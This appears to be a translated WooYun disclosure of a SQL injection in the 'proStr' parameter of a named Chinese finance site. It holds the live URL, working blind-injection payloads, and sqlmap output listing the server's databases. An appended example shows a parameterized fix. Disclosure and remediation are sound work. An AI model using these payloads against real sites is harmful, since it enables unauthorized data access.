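2015-03-18: Actively contacting the vendor and waiting for the vendor to claim the report; details are not disclosed publicly
2015-05-02: The vendor has actively ignored the vulnerability; details are disclosed to the public
A SQL injection vulnerability on the Jinfeng Caifu (金蜂财富) main site
http://www.jfcaifu.com/view/article-1510.html?proStr=21,22,23,20
Parameter: proStr is not filtered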
GET parameter 'proStr' is vulnerable. Do you want to keep testing the others (if any)? [y/N] n
sqlmap identified the following injection points with a total of 74 HTTP(s) requests:
---
Place: GET
Parameter: proStr
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: proStr=21,22,23,20) AND 3343=3343 AND (8678=8678

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: proStr=21,22,23,20) AND SLEEP(5) AND (1001=1001
---
[16:22:24] [INFO] the back-end DBMS is MySQL
web application technology: Nginx, JSP
back-end DBMS: MySQL 5.0.11
[16:22:24] [INFO] fetching database names
[16:22:24] [INFO] fetching number of databases
[16:22:24] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[16:22:24] [INFO] retrieved: 6
[16:22:26] [INFO] retrieved: information_schema
[16:22:59] [INFO] retrieved: bbs
[16:23:05] [INFO] retrieved: bbstest
[16:23:18] [INFO] retrieved: mysql
[16:23:27] [INFO] retrieved: performance_schema
[16:24:00] [INFO] retrieved: yinshu
available databases [6]:
[*] bbs
[*] bbstest
[*] information_schema
[*] mysql
[*] performance_schema
[*] yinshu
Unable to contact the vendor, or the vendor actively refused
Vulnerability Rank: 15 (WooYun rating)
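
An added example, not part of the original report or the site's code: the payloads above close a parenthesis after the id list, which suggests proStr is pasted into an IN (...) clause. Assuming that query shape, a hypothetical `product` table, and SQLite standing in for MySQL, the code below contrasts the concatenated lookup with one that validates the list and binds each id.

```python
import re
import sqlite3

# Strict grammar for the list: 1 to 20 non-negative integers separated by commas.
ID_LIST = re.compile(r"[0-9]{1,9}(?:,[0-9]{1,9}){0,19}")


def build_db():
    """Constructed sample data; the 'product' table and its columns are hypothetical."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE product (id INTEGER PRIMARY KEY, name TEXT)")
    db.executemany("INSERT INTO product VALUES (?, ?)",
                   [(20, "a"), (21, "b"), (22, "c"), (23, "d"), (99, "other")])
    return db


def lookup_concatenated(db, pro_str):
    """The 'before': the raw parameter is pasted inside IN (...), so it is parsed as SQL."""
    sql = "SELECT id FROM product WHERE id IN (" + pro_str + ") ORDER BY id"
    return [row[0] for row in db.execute(sql)]


def parse_id_list(pro_str):
    """Return the ids as ints, or raise ValueError for anything that is not a pure id list."""
    if not isinstance(pro_str, str) or not ID_LIST.fullmatch(pro_str):
        raise ValueError("proStr must be a comma-separated list of integers")
    return [int(part) for part in pro_str.split(",")]


def lookup_bound(db, pro_str):
    """The 'after': validate first, then bind one placeholder per id."""
    ids = parse_id_list(pro_str)
    marks = ",".join("?" * len(ids))  # only '?' characters are added to the SQL text
    sql = "SELECT id FROM product WHERE id IN (" + marks + ") ORDER BY id"
    return [row[0] for row in db.execute(sql, ids)]


if __name__ == "__main__":
    db = build_db()
    reported = "21,22,23,20) AND 3343=3343 AND (8678=8678"  # payload quoted in the report
    print("concatenated:", lookup_concatenated(db, reported))
    try:
        lookup_bound(db, reported)
    except ValueError as exc:
        print("bound lookup rejected input:", exc)
```

In a JSP/JDBC back end the same pattern maps to a `PreparedStatement` with one `?` per validated id.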